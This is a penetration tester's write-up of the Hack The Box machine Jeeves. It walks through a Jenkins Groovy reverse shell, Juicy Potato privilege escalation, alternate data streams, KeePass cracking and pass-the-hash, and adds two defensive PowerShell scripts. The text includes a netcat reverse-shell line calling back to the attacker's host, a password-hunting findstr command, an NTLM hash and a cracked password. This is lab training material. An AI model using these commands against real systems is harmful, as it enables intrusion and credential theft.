Hack The Box — Jeeves

Jeeves is a Medium-rated Hack The Box machine that is listed as more challenging than OSCP. Here we exploit Jenkins using a Groovy reverse shell and escalate privileges using Juicy Potato.

ENUMERATION

The Nmap scan shows us that ports 80, 135, 445 and 50000 are open.

Port 80 hosts an Ask Jeeves web page; we look at the source code and even directory bruteforce it, but find nothing useful.

However, when we use dirsearch on port 50000 we find a hidden directory called /askjeeves. DO NOTE that the wordlist we have to use is directory-list 1.0, and it will take quite some time. Using any other wordlist will take forever.

The directory brings us to this Jenkins web page. In Jenkins, if we go to > Manage Jenkins, there is a place called > Script Console where we can run a Groovy script to get a reverse shell. I had previously worked with Jenkins in another CTF, and the exploitation method for this box is the same, so you can refer to my writeup: https://sparshjazz.medium.com/tryhackme-alfred-1b21aef8bef3

EXPLOITATION

Go to > MANAGE JENKINS > SCRIPT CONSOLE

Read the first line. It tells us that we can run Groovy scripts here.

You can easily google "groovy script reverse shell" and find one in the PayloadsAllTheThings GitHub repo.

We run the Groovy reverse shell script and catch the connection on our netcat listener!

PRIVILEGE ESCALATION

We run quick commands like whoami and whoami /priv to see what privileges we have, and systeminfo to find more information about our target machine.

As we can see, the hostname is jeeves, the architecture is x64 and the target is Windows 10 Pro. We can also see that the build is 10586 and that SeImpersonatePrivilege and SeChangeNotifyPrivilege are ENABLED. And thus we know that we can run the Juicy Potato exploit.

About Juicy Potato: we use the Juicy Potato exploit if the Windows build is older than Windows 10 1809 or Windows Server 2019 and the target has SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege enabled. Since the build of our target is older than 1809 and the privileges are enabled as well, we can use it!!! You can refer to this writeup for detailed usage: https://medium.com/r3d-buck3t/impersonating-privileges-with-juicy-potato-e5896b20d505 (HIGHLY RECOMMENDED)
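The two preconditions above (build older than 1809 / Server 2019, plus an impersonation privilege in the token) are also exactly what a defender wants to check on their own hosts. The following PowerShell script is an added example written for this page, not code from the original writeup or from the Juicy Potato project: it reads the build number, parses whoami /priv and reports whether the account it runs as is exposed. It assumes English whoami output and that you run it in the context you are assessing (for example the account a service such as Jenkins runs as).

```powershell
# Added example, not part of the original writeup: report whether this host and
# the current token match the Juicy Potato preconditions (build older than
# 17763, i.e. Windows 10 1809 / Server 2019, plus SeImpersonatePrivilege or
# SeAssignPrimaryTokenPrivilege in the token). Run it in the context you are
# assessing, e.g. the account a service such as Jenkins runs as.

$os         = Get-CimInstance -ClassName Win32_OperatingSystem
$build      = [int]$os.BuildNumber
$fixedBuild = 17763   # first build on which the technique no longer works

# Parse `whoami /priv` (assumes English output): each privilege row ends with
# "Enabled" or "Disabled". A privilege that is present but Disabled is still
# held by the token and can be switched on by the process itself, so presence
# is what matters here; the state is reported for information only.
$privState = @{}
whoami /priv | ForEach-Object {
    if ($_ -match '^(Se\w+Privilege)\s+.+?\s+(Enabled|Disabled)\s*$') {
        $privState[$Matches[1]] = $Matches[2]
    }
}

$relevant = 'SeImpersonatePrivilege', 'SeAssignPrimaryTokenPrivilege'
$held     = @($relevant | Where-Object { $privState.ContainsKey($_) })

[pscustomobject]@{
    Host         = $env:COMPUTERNAME
    OS           = $os.Caption
    Build        = $build
    BuildPatched = ($build -ge $fixedBuild)
    HeldPrivs    = (($held | ForEach-Object { "$_=$($privState[$_])" }) -join ', ')
    Exposed      = (($build -lt $fixedBuild) -and ($held.Count -gt 0))
} | Format-List
```

A host that reports Exposed = True should be updated past build 17763, and services that do not need to impersonate clients should run under a dedicated low-privilege account rather than SYSTEM or a built-in service account that holds SeImpersonatePrivilege. For Jenkins specifically, the Script Console used above should also be reachable only by authenticated administrators, since it runs arbitrary Groovy as the service account.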

First we have to transfer the Juicy Potato exploit and the other necessary files to our target machine. To transfer files, we will use an SMB server hosted from our Kali machine (make sure that the files you want to upload to the target are in the /home/kali directory if you are following my commands). If you are not familiar with this, do some research and it will be clear. Our target does not support wget or certutil for file transfer, and trust me, an SMB server is best for transferring files!!!

On our target Windows machine, we make a temp directory inside C:\ and run the command to copy the file hosted by the SMB server on our Kali machine. The IP is that of our Kali machine, and we save the file in the C:\temp directory on Windows.

NOTE: For any further file transfer to the target machine, I'll use the same method. The usage is: copy \\kali-ip\filename C:\tmp\filename

(Make sure that the file you want to transfer from your Kali machine is in the /home/kali directory.) Anyway, moving on…

We have transferred JuicyPotato.exe to the target, along with GetCLSID.ps1, which is a PowerShell script. This script helps us find a valid CLSID for the Juicy Potato attack (download link: https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1).

Once GetCLSID.ps1 is downloaded and you have transferred it to the target, we need to run this PowerShell command:

After running this, a directory called Windows_10_Pro is created automatically, and within it there is a file called CLSID.list which we can read.

Now we need to transfer a reverse shell payload. You can use an .exe, a .bat or a PowerShell reverse shell. However, when I tried to use an .exe reverse shell which I made using msfvenom, it didn't work. Let's use a .bat reverse shell instead.

To do so, first run the command on your Kali machine to locate the netcat executable:

command — locate nc.exe

Next, copy nc.exe from your Kali machine to Windows as shown below.

Now on Windows, make a file called priv.bat with the following content (this is basically a one-liner netcat reverse shell which executes the nc.exe binary we have transferred):

C:\temp\nc.exe -e cmd.exe kali-ip 9999

REFER TO THIS IMAGE FOR A BETTER UNDERSTANDING

Finally it's time to run the Juicy Potato exploit. Here -l, which is set to port 9999, is our listening port. We have to start a netcat listener on port 9999 before running this exploit. priv.bat is our reverse shell and -c is our CLSID.

Run it and we get a shell as SYSTEM.

ROOT FLAG

This was the most annoying part of the machine. As per Hack The Box's rules, the root flag should always be in a text file on the Administrator's Desktop. However, if you go to > Administrator > Desktop, you will find a file called hm.txt which tells you to go deeper. After this I spent 30 minutes looking for txt, xml, ini or other useful files using the command:

findstr /si password *.txt *.xml *.ini

However, I was unable to find it. After reading a writeup I found out that this was new to others as well; I learned that it was related to Alternate Data Streams, and that you need to run a command to actually see it:

dir /r /a:

Alternate Data Streams (ADS) are a feature of NTFS files that can be used to hide information. You can show alternate data streams in a directory listing with the /r switch. (FOR MORE INFORMATION, USE GOOGLE)

Some Windows utilities recognize ADS and some don't. For example, type, the go-to utility for reading text from a file, does not, so I used the more command, which seemed okay with the following:

To get the root flag, we have to run:

more < hm.txt:root.txt
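The dir /r and more < file:stream commands above are the cmd way of looking at streams; the same thing is easier to do systematically from PowerShell, whose file-system provider exposes streams directly. The script below is an added example written for this page (not from the original writeup): it walks a directory, lists every alternate stream on every file, flags the common benign Zone.Identifier stream separately, and reads the others. It assumes an NTFS volume, and the default path is a placeholder.

```powershell
# Added example, not part of the original writeup: enumerate alternate data
# streams under a directory with Get-Item -Stream, which shows what a plain
# `dir` or `type` hides. Assumes an NTFS volume; the default path is a placeholder.
param([string]$Root = 'C:\Users\Administrator\Desktop')

$findings = Get-ChildItem -LiteralPath $Root -File -Recurse -Force -ErrorAction SilentlyContinue |
    ForEach-Object {
        $file = $_
        # Get-Item -Stream * returns one object per stream. ':$DATA' is the
        # ordinary file content; any other name is an alternate stream attached
        # to the same file.
        Get-Item -LiteralPath $file.FullName -Stream * -ErrorAction SilentlyContinue |
            Where-Object { $_.Stream -ne ':$DATA' } |
            ForEach-Object {
                # Zone.Identifier is the usual benign stream (mark of the web
                # written by browsers on download); anything else deserves a look.
                $note = if ($_.Stream -eq 'Zone.Identifier') { 'mark-of-the-web' } else { 'review' }
                [pscustomobject]@{
                    File   = $file.FullName
                    Stream = $_.Stream
                    Bytes  = $_.Length
                    Note   = $note
                }
            }
    }

$findings | Format-Table -AutoSize

# Read each non-benign stream directly; this is the PowerShell equivalent of
# the `more < file:stream` redirection used in cmd.
foreach ($f in ($findings | Where-Object Note -eq 'review')) {
    "--- $($f.File):$($f.Stream) ---"
    Get-Content -LiteralPath $f.File -Stream $f.Stream
}
```

Run it as .\Find-Ads.ps1 -Root 'C:\Users\Administrator\Desktop' (or any directory). On the box above it would list hm.txt with a root.txt stream marked "review" and print that stream's content; on a normal workstation the output is mostly Zone.Identifier entries, which is why they are labelled rather than hidden.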

[BONUS] — Cracking .kdbx file (keypass) & USING pth-winexe for Pass The Hash Attack

At C:\Users\kohsuke\Documents, I found an interesting file:

Googling the kdbx extension, I discovered that it represents an encrypted data store for a password manager program named KeePass. Figuring that the passwords inside could further my compromise of the box, I downloaded the file and researched the file type more deeply. I learned that the keepass2john utility could extract a password hash from this file that would then be loadable by the hash cracking utility John The Ripper. The process of using keepass2john and John itself to obtain the master password for the KeePass file is shown below.

As indicated by the image, the password for the KeePass file was “moonshine1”. To open the CEH.kdbx data store with this password, I downloaded the portable version of KeePass, executed it, and simply used the >FILE → Open File menu option to load CEH.kdbx. When prompted, I provided the password that John found, which proved sufficient to decrypt the data store and show me many things I wasn’t supposed to see:

NOTE: In order to manually open the KeePass database file from the command line, we can use kpcli. Refer to this writeup by Rana Khalil: https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/more-challenging-than-oscp/jeeves-writeup-w-o-metasploit

I examined each password individually and discovered that the “Backup stuff” password was an NTLM hash aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00. I thought that I could use this in a pass-the-hash attack against the JEEVES machine’s Administrator account to gain elevated privileges. There are numerous tools that could aid us in doing this. I chose to use the simple pth-winexe program, as shown below.

CONCLUSION

This was a really interesting box, apart from finding the root flag, which was pretty annoying and CTF-like. In this box, we learned that:

  • Always directory bruteforce all web-related ports
  • We can get a reverse shell from Jenkins using a Groovy script
  • We use the Juicy Potato exploit if the Windows build is older than Windows 10 1809 or Windows Server 2019 and the target has SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege enabled
  • In case the Juicy Potato exploit doesn't work, we can try a .bat reverse shell for the (-p) option or even a PowerShell reverse shell. In case the CLSID doesn't work, we can find valid ones using a script like GetCLSID.ps1
  • If we have a .kdbx file (KeePass), we can crack it using keepass2john
  • If we find an NTLM hash of the Windows target, we can use pth-winexe to perform a pass-the-hash attack and get an admin shell

I am a Penetration Tester, currently pursuing OSCP. Skilled in network pen-testing and developing hacking tools using Python. I share my knowledge on YouTube.

ZeusCybersec